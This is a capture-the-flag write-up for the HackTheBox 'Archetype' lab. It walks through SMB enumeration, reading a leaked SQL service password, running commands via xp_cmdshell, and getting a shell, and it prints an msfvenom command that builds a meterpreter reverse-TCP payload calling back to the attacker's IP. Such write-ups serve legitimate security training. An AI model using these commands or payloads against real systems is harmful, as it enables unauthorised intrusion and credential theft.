CTF-Writeups/HackTheBox/Archetype.md
2021-05-09 12:02:32 +05:00

4.3 KiB

HackTheBox-Archetype

NMAP


PORT     STATE SERVICE      VERSION                                       
135/tcp  open  msrpc        Microsoft Windows RPC                         
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-09T05:37:36
| Not valid after:  2051-05-09T05:37:36
| MD5:   dd26 d0f2 bf23 57ec 693e 11af 7fe6 51f3
|_SHA-1: be4f 58af 20c9 c656 7ae4 4c6a bbfe 1ae2 6ce8 7f16
|_ssl-date: 2021-05-09T05:48:20+00:00; +18m07s from scanner time.
PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows


From the scan we scan see SMB service is running so we can check if we are allowed to access shares as anonymous user

PORT 139/445 (SMB)

Here we can see we can read backups share so let's do it

Download the file using get prod.dtsConfig

On reading the file we can there's a password for sql_svc service account

Let's verify it through crackmapexec

And it seems the credentials are valid, so I am going to be using sqsh which is an opensource interactive database shell

Now to execute windows commands we are going to use xp_cmdshell which spawns a windows command shell . xp_cmdshell is an extended stored procedure provided by Microsoft and stored in the master database. So the whole command will be

EXEC master ..xp_cmdshell 'whoami'

Here EXEC is used to execute stored procedure on a database and stored procedures are kinda like functions in mysql /mssql.

Perfect now we need to what's our current location in file system so we may upload our payload and get a proper shell

Right now we are in system32 folder where we don't have permissions to read and write so we may need to save our payload in a directory where we are allowed to

This looks the directory for the service account or user in this case now since he has his own directory

Generate a windows 64 bit metepreter payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.220 LPORT=2222 -f exe > shell.exe

Now host this on local machine using python3

And download it like this

But whenever I try to execute the payload it would get deleted so there's some schedule tasks or scripts running in the background so can't do it like this also I tried uploading a powershell script and executing but that was blocked as well

So the only option left was to upload a netcat executable for 64 bit version

Then simply run the executable

Running whoami /all we can see privileges on the machine

I tried to use PrintSpooferexploit but it failed

At this point I took a hint for the escalation because everything was failing and it wasn't meant to be exploited like that so I was told to find password for Administrator account so I started to view hidden files with dir /a

Since WinRM port is open we can remotely login using these credentials